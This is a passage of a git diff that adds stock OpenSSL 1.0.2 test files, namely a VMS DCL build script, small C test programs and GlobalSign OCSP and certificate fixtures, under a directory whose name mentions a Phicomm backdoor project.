+$   WRITE SYS$OUTPUT "    GNUC  :  To Compile With GNU C."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Time To EXIT.
+$!
+$   EXIT
+$ ENDIF
+$!
+$! Time to check the contents, and to make sure we get the correct library.
+$!
+$ IF P3.EQS."SOCKETSHR" .OR. P3.EQS."MULTINET" .OR. P3.EQS."UCX" -
+     .OR. P3.EQS."TCPIP" .OR. P3.EQS."NONE"
+$ THEN
+$!
+$!  Check to see if SOCKETSHR was chosen
+$!
+$   IF P3.EQS."SOCKETSHR"
+$   THEN
+$!
+$!    Set the library to use SOCKETSHR
+$!
+$     TCPIP_LIB = ",SYS$DISK:[-.VMS]SOCKETSHR_SHR.OPT /OPTIONS"
+$!
+$!    Done with SOCKETSHR
+$!
+$   ENDIF
+$!
+$!  Check to see if MULTINET was chosen
+$!
+$   IF P3.EQS."MULTINET"
+$   THEN
+$!
+$!    Set the library to use UCX emulation.
+$!
+$     P3 = "UCX"
+$!
+$!    Done with MULTINET
+$!
+$   ENDIF
+$!
+$!  Check to see if UCX was chosen
+$!
+$   IF P3.EQS."UCX"
+$   THEN
+$!
+$!    Set the library to use UCX.
+$!
+$     TCPIP_LIB = ",SYS$DISK:[-.VMS]UCX_SHR_DECC.OPT /OPTIONS"
+$     IF F$TRNLNM("UCX$IPC_SHR") .NES. ""
+$     THEN
+$       TCPIP_LIB = ",SYS$DISK:[-.VMS]UCX_SHR_DECC_LOG.OPT /OPTIONS"
+$     ELSE
+$       IF COMPILER .NES. "DECC" .AND. ARCH .EQS. "VAX" THEN -
+	  TCPIP_LIB = ",SYS$DISK:[-.VMS]UCX_SHR_VAXC.OPT /OPTIONS"
+$     ENDIF
+$!
+$!    Done with UCX
+$!
+$   ENDIF
+$!
+$!  Check to see if TCPIP was chosen
+$!
+$   IF P3.EQS."TCPIP"
+$   THEN
+$!
+$!    Set the library to use TCPIP (post UCX).
+$!
+$     TCPIP_LIB = ",SYS$DISK:[-.VMS]TCPIP_SHR_DECC.OPT /OPTIONS"
+$!
+$!    Done with TCPIP
+$!
+$   ENDIF
+$!
+$!  Check to see if NONE was chosen
+$!
+$   IF P3.EQS."NONE"
+$   THEN
+$!
+$!    Do not use a TCPIP library.
+$!
+$     TCPIP_LIB = ""
+$!
+$!    Done with NONE
+$!
+$   ENDIF
+$!
+$!  Print info
+$!
+$   WRITE SYS$OUTPUT "TCP/IP library spec: ", TCPIP_LIB- ","
+$!
+$!  Else The User Entered An Invalid Argument.
+$!
+$ ELSE
+$!
+$!  Tell The User We Don't Know What They Want.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The Option ",P3," Is Invalid.  The Valid Options Are:"
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "    SOCKETSHR  :  To link with SOCKETSHR TCP/IP library."
+$   WRITE SYS$OUTPUT "    UCX        :  To link with UCX TCP/IP library."
+$   WRITE SYS$OUTPUT "    TCPIP      :  To link with TCPIP (post UCX) TCP/IP library."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Time To EXIT.
+$!
+$   EXIT
+$!
+$!  Done with TCP/IP libraries
+$!
+$ ENDIF
+$!
+$! Special Threads For OpenVMS v7.1 Or Later
+$!
+$! Written By:  Richard Levitte
+$!              richard@levitte.org
+$!
+$!
+$! Check To See If We Have A Option For P4.
+$!
+$ IF (P4.EQS."")
+$ THEN
+$!
+$!  Get The Version Of VMS We Are Using.
+$!
+$   ISSEVEN :=
+$   TMP = F$ELEMENT(0,"-",F$EXTRACT(1,4,F$GETSYI("VERSION")))
+$   TMP = F$INTEGER(F$ELEMENT(0,".",TMP)+F$ELEMENT(1,".",TMP))
+$!
+$!  Check To See If The VMS Version Is v7.1 Or Later.
+$!
+$   IF (TMP.GE.71)
+$   THEN
+$!
+$!    We Have OpenVMS v7.1 Or Later, So Use The Special Threads.
+$!
+$     ISSEVEN := ,PTHREAD_USE_D4
+$!
+$!  End The VMS Version Check.
+$!
+$   ENDIF
+$!
+$! End The P4 Check.
+$!
+$ ENDIF
+$!
+$!  Time To RETURN...
+$!
+$ RETURN
+$!
+$ INITIALISE:
+$!
+$! Save old value of the logical name OPENSSL
+$!
+$ __SAVE_OPENSSL = F$TRNLNM("OPENSSL","LNM$PROCESS_TABLE")
+$!
+$! Save directory information
+$!
+$ __HERE = F$PARSE(F$PARSE("A.;",F$ENVIRONMENT("PROCEDURE"))-"A.;","[]A.;") - "A.;"
+$ __HERE = F$EDIT(__HERE,"UPCASE")
+$ __TOP = __HERE - "TEST]"
+$ __INCLUDE = __TOP + "INCLUDE.OPENSSL]"
+$!
+$! Set up the logical name OPENSSL to point at the include directory
+$!
+$ DEFINE OPENSSL /NOLOG '__INCLUDE'
+$!
+$! Done
+$!
+$ RETURN
+$!
+$ CLEANUP:
+$!
+$! Restore the logical name OPENSSL if it had a value
+$!
+$ IF __SAVE_OPENSSL .EQS. ""
+$ THEN
+$   DEASSIGN OPENSSL
+$ ELSE
+$   DEFINE /NOLOG OPENSSL '__SAVE_OPENSSL'
+$ ENDIF
+$!
+$! Done
+$!
+$ RETURN
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/md2test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/md2test.c
new file mode 100644
index 0000000..554acc2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/md2test.c
@@ -0,0 +1,57 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <ctype.h>
+#include <openssl/e_os2.h>
+#include <openssl/buffer.h>
+#include <openssl/crypto.h>
+
+int main(int argc, char *argv[])
+{
+    char *p, *q = 0, *program;
+
+    p = strrchr(argv[0], '/');
+    if (!p)
+        p = strrchr(argv[0], '\\');
+#ifdef OPENSSL_SYS_VMS
+    if (!p)
+        p = strrchr(argv[0], ']');
+    if (p)
+        q = strrchr(p, '>');
+    if (q)
+        p = q;
+    if (!p)
+        p = strrchr(argv[0], ':');
+    q = 0;
+#endif
+    if (p)
+        p++;
+    if (!p)
+        p = argv[0];
+    if (p)
+        q = strchr(p, '.');
+    if (p && !q)
+        q = p + strlen(p);
+
+    if (!p)
+        program = BUF_strdup("(unknown)");
+    else {
+        program = OPENSSL_malloc((q - p) + 1);
+        strncpy(program, p, q - p);
+        program[q - p] = '\0';
+    }
+
+    for (p = program; *p; p++)
+        if (islower((unsigned char)(*p)))
+            *p = toupper((unsigned char)(*p));
+
+    q = strstr(program, "TEST");
+    if (q > p && q[-1] == '_')
+        q--;
+    *q = '\0';
+
+    printf("No %s support\n", program);
+
+    OPENSSL_free(program);
+    return (0);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/md4test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/md4test.c
new file mode 120000
index 0000000..1509be9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/md4test.c
@@ -0,0 +1 @@
+../crypto/md4/md4test.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/md5test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/md5test.c
new file mode 120000
index 0000000..20f4aaf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/md5test.c
@@ -0,0 +1 @@
+../crypto/md5/md5test.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/mdc2test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/mdc2test.c
new file mode 120000
index 0000000..c4ffe48
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/mdc2test.c
@@ -0,0 +1 @@
+../crypto/mdc2/mdc2test.c
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/methtest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/methtest.c
new file mode 100644
index 0000000..de66c10
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/methtest.c
@@ -0,0 +1,107 @@
+/* test/methtest.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/rsa.h>
+#include <openssl/x509.h>
+#include "meth.h"
+#include <openssl/err.h>
+
+int main(argc, argv)
+int argc;
+char *argv[];
+{
+    METHOD_CTX *top, *tmp1, *tmp2;
+
+    top = METH_new(x509_lookup()); /* get a top level context */
+    if (top == NULL)
+        goto err;
+
+    tmp1 = METH_new(x509_by_file());
+    if (top == NULL)
+        goto err;
+    METH_arg(tmp1, METH_TYPE_FILE, "cafile1");
+    METH_arg(tmp1, METH_TYPE_FILE, "cafile2");
+    METH_push(top, METH_X509_CA_BY_SUBJECT, tmp1);
+
+    tmp2 = METH_new(x509_by_dir());
+    METH_arg(tmp2, METH_TYPE_DIR, "/home/eay/.CAcerts");
+    METH_arg(tmp2, METH_TYPE_DIR, "/home/eay/SSLeay/certs");
+    METH_arg(tmp2, METH_TYPE_DIR, "/usr/local/ssl/certs");
+    METH_push(top, METH_X509_CA_BY_SUBJECT, tmp2);
+
+/*- tmp=METH_new(x509_by_issuer_dir);
+    METH_arg(tmp,METH_TYPE_DIR,"/home/eay/.mycerts");
+    METH_push(top,METH_X509_BY_ISSUER,tmp);
+
+    tmp=METH_new(x509_by_issuer_primary);
+    METH_arg(tmp,METH_TYPE_FILE,"/home/eay/.mycerts/primary.pem");
+    METH_push(top,METH_X509_BY_ISSUER,tmp);
+*/
+
+    METH_init(top);
+    METH_control(tmp1, METH_CONTROL_DUMP, stdout);
+    METH_control(tmp2, METH_CONTROL_DUMP, stdout);
+    EXIT(0);
+ err:
+    ERR_load_crypto_strings();
+    ERR_print_errors_fp(stderr);
+    EXIT(1);
+    return (0);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D1.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D1.ors
new file mode 100644
index 0000000..3fa4a11
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D1.ors
@@ -0,0 +1,32 @@
+MIIFzwoBAKCCBcgwggXEBgkrBgEFBQcwAQEEggW1MIIFsTCBoKIWBBRf2uQDFpGg
+Ywh4P1y2H9bZ2/BQNBgPMjAxMjEwMjMxMDI1MzZaMHUwczBLMAkGBSsOAwIaBQAE
+FKByDqBqfGICVPKo9Z3Se6Tzty+kBBSwsEr9HHUo+BxhqhP2+sGQPWsWowISESG8
+vx4IzALnkqQG05AvM+2bgAAYDzIwMTIxMDIzMDcwMDAwWqARGA8yMDEyMTAzMDA4
+MDAwMFowCwYJKoZIhvcNAQEFA4IBAQAJU3hXN7NApN50/vlZTG2p8+QQJp4uaod3
+wyBQ0Ux3DoQZQ9RG6/7Mm4qpOLCCSTh/lJjZ0fD+9eB3gcp/JupN1JrU+dgTyv/Y
+9MOctJz7y+VoU9I+qB8knV4sQCwohAVm8GmA9s4p/rHq5Oymci0SuG/QCfkVxOub
+rI1bWjbHLvvXyvF3PoGMORVHG3SA+jJ9VkHWJyi6brHxY+QR/iYxer8lJsBtpyc7
+q2itFgvax/OHwne3lxsck9q0QgKpmEdJu2LuGyWFIhrEwR3b7ASEu1G/nKClv3dR
+vyOXMm1XIwuUhCjAcpNEKiOMorFwnLS1F8LhfqFWTAFG0JbWpAi8oIID+DCCA/Qw
+ggPwMIIC2KADAgECAhIRISdENsrz1CSWG3VIBwfQERQwDQYJKoZIhvcNAQEFBQAw
+WTELMAkGA1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExLzAtBgNV
+BAMTJkdsb2JhbFNpZ24gRXh0ZW5kZWQgVmFsaWRhdGlvbiBDQSAtIEcyMB4XDTEy
+MDkxOTA3NDA1MFoXDTEyMTIxOTA4NDA1MFowgYUxCzAJBgNVBAYTAkJFMRkwFwYD
+VQQKExBHbG9iYWxTaWduIG52LXNhMUIwQAYDVQQDEzlHbG9iYWxTaWduIEV4dGVu
+ZGVkIFZhbGlkYXRpb24gQ0EgLSBHMiBPQ1NQIHJlc3BvbmRlciAtIDIxFzAVBgNV
+BAUTDjIwMTIwOTE5MDk0MDAwMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
+AQEAnCgMsBO+IxIqCnXCOfXJoIC3wj+f0s4DV9h2gJBzisWXkaJD2DfNrd0kHUXK
+qVVPUxnA4G5iZu0Z385/KiOt1/P6vQ/Z2/AsEh/8Z/hIyeZCHL31wrSZW4yLeZwi
+M76wPiBHJxPun681HQlVs/OGKSHnbHc1XJAIeA/M8u+lLWqIKB+AJ82TrOqUMj1s
+LjGhQNs84xPliONN5K7DrEy+Y65X/rFxN77Smw+UtcH1GgH2NgaHH8dpt1m25sgm
+UxZWhdx66opB/lbRQwWdGt7MC0kJFaWHDZq64DTuYoekFYSxAFu0nd0EekEHEJEi
+9mquB9cv/96SuEJl8BcUWU/1LwIDAQABo4GEMIGBMAkGA1UdEwQCMAAwDgYDVR0P
+AQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMJMA8GCSsGAQUFBzABBQQCBQAw
+HQYDVR0OBBYEFF/a5AMWkaBjCHg/XLYf1tnb8FA0MB8GA1UdIwQYMBaAFLCwSv0c
+dSj4HGGqE/b6wZA9axajMA0GCSqGSIb3DQEBBQUAA4IBAQCKRl1iXFmOQtLseDWP
+Y5icDDBGiRi17CGgvIzGJi/ha0PhbO+X0TmQIEnRX3Mu0Er/Mm4RZSjMtJ2iZRh3
+tGf4Dn+jKgKOmgXC3oOG/l8RPHLf0yaPSdn/z0TXtA30vTFBLlFeWnhbfhovea4+
+snPdBxLqWZdtxmiwojgqA7YATCWwavizrBr09YRyDwzgtpZ2BwMruGuFuV9FsEwL
+PCM53yFlrM32oFghyfyE5kYjgnnueKM+pw1kA0jgb1CnVJRrMEN1TXuXDAZLtHKG
+5X/drah1JtkoZhCzxzZ3bYdVDQJ90OHFqM58lwGD6z3XuPKrHDKZKt+CPIsl5g7p
+4J2l
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D1_Cert_EE.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D1_Cert_EE.pem
new file mode 100644
index 0000000..c5b993c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D1_Cert_EE.pem
@@ -0,0 +1,38 @@
+-----BEGIN CERTIFICATE-----
+MIIGujCCBaKgAwIBAgISESG8vx4IzALnkqQG05AvM+2bMA0GCSqGSIb3DQEBBQUA
+MFkxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWduIG52LXNhMS8wLQYD
+VQQDEyZHbG9iYWxTaWduIEV4dGVuZGVkIFZhbGlkYXRpb24gQ0EgLSBHMjAeFw0x
+MjA4MTQxMjM1MDJaFw0xMzA4MTUxMDMxMjlaMIIBCjEdMBsGA1UEDwwUUHJpdmF0
+ZSBPcmdhbml6YXRpb24xDzANBgNVBAUTBjU3ODYxMTETMBEGCysGAQQBgjc8AgED
+EwJVUzEeMBwGCysGAQQBgjc8AgECEw1OZXcgSGFtcHNoaXJlMQswCQYDVQQGEwJV
+UzEWMBQGA1UECAwNTmV3IEhhbXBzaGlyZTETMBEGA1UEBwwKUG9ydHNtb3V0aDEg
+MB4GA1UECRMXVHdvIEludGVybmF0aW9uYWwgRHJpdmUxDTALBgNVBAsMBC5DT00x
+GzAZBgNVBAoMEkdNTyBHbG9iYWxTaWduIEluYzEbMBkGA1UEAwwSd3d3Lmdsb2Jh
+bHNpZ24uY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqx/nHBP4
+6s5KKMDlfZS4qFDiAWsoPSRn6WO4nrUF/G2S3I/AdJ0IcSDOHb48/3APj5alqbgo
+o4IzdG6KLAbENpHMl0L3pHBq/5tJPTi02SbiYUHfp2fhueMauRo8spfEk6fNRnDn
+QpyMFRkYd7Jz+KMerTO1xAcOH+xp0KkcP0i2jFTEuM3LwR0yTms1rry+RryjDDt5
+7W0DLnNFWhyGd6YymzNkCPeL6weV8uk2uYRKKf2XOAzgIpNo3zU6iakZOzlQB9h9
+qRuIks2AU/cZ89cBkDjHua0ezX5rG3/Url33jAT9cR5zCXHWtj7VzlOjDXXnn16b
+L9/AWsvGMNkYHQIDAQABo4ICxzCCAsMwDgYDVR0PAQH/BAQDAgWgMEwGA1UdIARF
+MEMwQQYJKwYBBAGgMgEBMDQwMgYIKwYBBQUHAgEWJmh0dHBzOi8vd3d3Lmdsb2Jh
+bHNpZ24uY29tL3JlcG9zaXRvcnkvMIIBKwYDVR0RBIIBIjCCAR6CEnd3dy5nbG9i
+YWxzaWduLmNvbYIVc3RhdHVzLmdsb2JhbHNpZ24uY29tghF0aC5nbG9iYWxzaWdu
+LmNvbYISZGV2Lmdsb2JhbHNpZ24uY29tghNpbmZvLmdsb2JhbHNpZ24uY29tghZh
+cmNoaXZlLmdsb2JhbHNpZ24uY29tghZzdGF0aWMxLmdsb2JhbHNpZ24uY29tghZz
+dGF0aWMyLmdsb2JhbHNpZ24uY29tghNibG9nLmdsb2JhbHNpZ24uY29tghdzc2xj
+aGVjay5nbG9iYWxzaWduLmNvbYIVc3lzdGVtLmdsb2JhbHNpZ24uY29tghhvcGVy
+YXRpb24uZ2xvYmFsc2lnbi5jb22CDmdsb2JhbHNpZ24uY29tMAkGA1UdEwQCMAAw
+HQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMD8GA1UdHwQ4MDYwNKAyoDCG
+Lmh0dHA6Ly9jcmwuZ2xvYmFsc2lnbi5jb20vZ3MvZ3NleHRlbmR2YWxnMi5jcmww
+gYgGCCsGAQUFBwEBBHwwejBBBggrBgEFBQcwAoY1aHR0cDovL3NlY3VyZS5nbG9i
+YWxzaWduLmNvbS9jYWNlcnQvZ3NleHRlbmR2YWxnMi5jcnQwNQYIKwYBBQUHMAGG
+KWh0dHA6Ly9vY3NwMi5nbG9iYWxzaWduLmNvbS9nc2V4dGVuZHZhbGcyMB0GA1Ud
+DgQWBBSvMoTDlFB0aVgVrNkkS1QSmYfx1zAfBgNVHSMEGDAWgBSwsEr9HHUo+Bxh
+qhP2+sGQPWsWozANBgkqhkiG9w0BAQUFAAOCAQEAgnohm8IRw1ukfc0GmArK3ZLC
+DLGpsefwWMvNrclqwrgtVrBx4pfe5xGAjqyQ2QI8V8a8a1ytVMCSC1AMWiWxawvW
+fw48fHunqtpTYNDyEe1Q+7tTGZ0SQ3HljYY9toVEjAMDhiM0Szl6ERRO5S7BTCen
+mDpWZF8w3ScRRY2UJc8xwWFiYyGWDNzNL1O8R2Y95QIkHUgQpSD3cjl4YvF/Xx/o
+hBEzl884uNAggIyQRu0ImLEetEtHWB2w0pZG3nTAqjOAAAyH2Q8IHoJtjQzvg6fy
+IQEO1C5GoQ7isiKIjKBXVYOm+gKSQXlzwj1BlU/OW6kEe24IiERhAN9ILA24wA==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D1_Issuer_ICA.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D1_Issuer_ICA.pem
new file mode 100644
index 0000000..b650f38
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D1_Issuer_ICA.pem
@@ -0,0 +1,27 @@
+-----BEGIN CERTIFICATE-----
+MIIEhjCCA26gAwIBAgILBAAAAAABL07hXdQwDQYJKoZIhvcNAQEFBQAwTDEgMB4G
+A1UECxMXR2xvYmFsU2lnbiBSb290IENBIC0gUjIxEzARBgNVBAoTCkdsb2JhbFNp
+Z24xEzARBgNVBAMTCkdsb2JhbFNpZ24wHhcNMTEwNDEzMTAwMDAwWhcNMjIwNDEz
+MTAwMDAwWjBZMQswCQYDVQQGEwJCRTEZMBcGA1UEChMQR2xvYmFsU2lnbiBudi1z
+YTEvMC0GA1UEAxMmR2xvYmFsU2lnbiBFeHRlbmRlZCBWYWxpZGF0aW9uIENBIC0g
+RzIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDNoUbMUpq4pbR/WNnN
+2EugcgyXW6aIIMO5PUbc0FxSMPb6WU+FX7DbiLSpXysjSKyr9ZJ4FLYyD/tcaoVb
+AJDgu2X1WvlPZ37HbCnsk8ArysRe2LDb1r4/mwvAj6ldrvcAAqT8umYROHf+IyAl
+VRDFvYK5TLFoxuJwe4NcE2fBofN8C6iZmtDimyUxyCuNQPZSY7GgrVou9Xk2bTUs
+Dt0F5NDiB0i3KF4r1VjVbNAMoQFGAVqPxq9kx1UBXeHRxmxQJaAFrQCrDI1la93r
+wnJUyQ88ABeHIu/buYZ4FlGud9mmKE3zWI2DZ7k0JZscUYBR84OSaqOuR5rW5Isb
+wO2xAgMBAAGjggFaMIIBVjAOBgNVHQ8BAf8EBAMCAQYwEgYDVR0TAQH/BAgwBgEB
+/wIBADAdBgNVHQ4EFgQUsLBK/Rx1KPgcYaoT9vrBkD1rFqMwRwYDVR0gBEAwPjA8
+BgRVHSAAMDQwMgYIKwYBBQUHAgEWJmh0dHBzOi8vd3d3Lmdsb2JhbHNpZ24uY29t
+L3JlcG9zaXRvcnkvMDYGA1UdHwQvMC0wK6ApoCeGJWh0dHA6Ly9jcmwuZ2xvYmFs
+c2lnbi5uZXQvcm9vdC1yMi5jcmwwRAYIKwYBBQUHAQEEODA2MDQGCCsGAQUFBzAB
+hihodHRwOi8vb2NzcC5nbG9iYWxzaWduLmNvbS9FeHRlbmRlZFNTTENBMCkGA1Ud
+JQQiMCAGCCsGAQUFBwMBBggrBgEFBQcDAgYKKwYBBAGCNwoDAzAfBgNVHSMEGDAW
+gBSb4gdXZxwewGoG3lm0mi3f3BmGLjANBgkqhkiG9w0BAQUFAAOCAQEAL0m28rZa
+pJWrnlrpK4KbzJBrfHRFIOde2Mcj7ig1sTVlKqVR4FU/9oNntOQ2KbDa7JeVqYoF
+o0X+Iy5SiLQfEICt0oufo1+oxetz3nmIQZgz7qdgGLFGyUAQB5yPClLJExoGbqCb
+LTr2rk/no1E1KlsYBRLlUdy2NmLz4aQP++TPw5S/EauhWTEB8MxT7I9j12yW00gq
+iiPtRVaoZkHqAblH7qFHDBTxI+Egc8p9UHxkOFejj0qcm+ltRc9Ea01gIEBxJbVG
+qmwIft/I+shWKpLLg7h5CZctXqEBzgbttJfJBNxB7+BPNk3kQHNG7BESfIhbNCYl
+TercGL7FG81kwA==
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D2.ors b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D2.ors
new file mode 100644
index 0000000..dcbd4d4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/ocsp-tests/D2.ors
@@ -0,0 +1,32 @@
+MIIF4AoBAKCCBdkwggXVBgkrBgEFBQcwAQEEggXGMIIFwjCBmaIWBBTqlwecTarB
+yVdbHxANRLCFYj1mqBgPMjAxMjEwMjMxMDI1MzZaMG4wbDBEMAkGBSsOAwIaBQAE
+FLdXtbacB/gWIxOOkMkqDr4yAaoxBBRge2YaRQ2XyolQL30EzTSo//z9SwILBAAA
+AAABL07hRxCAABgPMjAxMjEwMDEwNjAwMDBaoBEYDzIwMTMwNDE1MDYwMDAwWjAL
+BgkqhkiG9w0BAQUDggEBAEJN4FuPQPnizPIwEj4Q8Ht765gI6QqMNrvj3UykxYeu
+qUajKcqA+V1zaDHTaz+eCQthtmCNKC9T+zVkjGelVsd7Kn2fVKWqp+5wVPI8dVkm
+6Gs/IGZ16HDnQ/siTrY3ILWCRz4Hf6lnHpIErQuQRQyjlGKNcE7RYmjGw4w0bxx8
+vHN/baCMApBL0D0zeBqlpJCMUZqJJ3D1+87HxHYR1MkMZDC9rOPIhlpEP4yL17gx
+ckrPf+w+A/3kC++jVeA3b8Xtr+MaWOFH4xVn6BTxopczZKVl18tSYqgwITlx5/cL
+LpYEdllC0l83E8GRzsOp0SvFxo0NBotgFNZQQujpOzagggQQMIIEDDCCBAgwggLw
+oAMCAQICCwQAAAAAAThXovYBMA0GCSqGSIb3DQEBBQUAMFcxCzAJBgNVBAYTAkJF
+MRkwFwYDVQQKExBHbG9iYWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRsw
+GQYDVQQDExJHbG9iYWxTaWduIFJvb3QgQ0EwHhcNMTIwNzA1MTgwMDAwWhcNMTMw
+NzA1MTgwMDAwWjBZMQswCQYDVQQGEwJCRTEZMBcGA1UEChMQR2xvYmFsU2lnbiBu
+di1zYTEvMC0GA1UEAxMmR2xvYmFsU2lnbiBPQ1NQIGZvciBSb290IFIxIC0gQnJh
+bmNoIDEwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDP2QF8p0+Fb7ID
+MwwD1gEr2oazjqbW28EZr3YEyMPk+7VFaGePSO1xjBGIE48Q7m7d6p6ZXCzlBZEi
+oudrHSr3WDqdIVKLDrZIDkgEgdjJE72Hq6Pf5CEGXyebbODm4sV96EfewSvOOYLL
+866g3aoVhLDK02ny+Q5OsokW7nhnmGMMh10tZqR5VmdQTiw8MgeqUxBEaEO4WH2J
+ltgSsgNJBNBYuDgnn5ryzVqhvmCJvYZMYeN6qZFKy1MgHcR+wEpGLPlRL4ttu6e5
+MJrVta7dVFobHUHoFog97LtQT1PY0Ubaihswjge5O04bYeCrgSSjr1e4xH/KDxRw
+yyhoscaFAgMBAAGjgdIwgc8wDgYDVR0PAQH/BAQDAgeAMB0GA1UdDgQWBBTqlwec
+TarByVdbHxANRLCFYj1mqDBMBgNVHSAERTBDMEEGCSsGAQQBoDIBXzA0MDIGCCsG
+AQUFBwIBFiZodHRwczovL3d3dy5nbG9iYWxzaWduLmNvbS9yZXBvc2l0b3J5LzAJ
+BgNVHRMEAjAAMBMGA1UdJQQMMAoGCCsGAQUFBwMJMB8GA1UdIwQYMBaAFGB7ZhpF
+DZfKiVAvfQTNNKj//P1LMA8GCSsGAQUFBzABBQQCBQAwDQYJKoZIhvcNAQEFBQAD
+ggEBAHiC6N1uF29d7CmiVapA8Nr1xLSVeIkBd4A8yHsUTQ7ATI7bwT14QUV4awe7
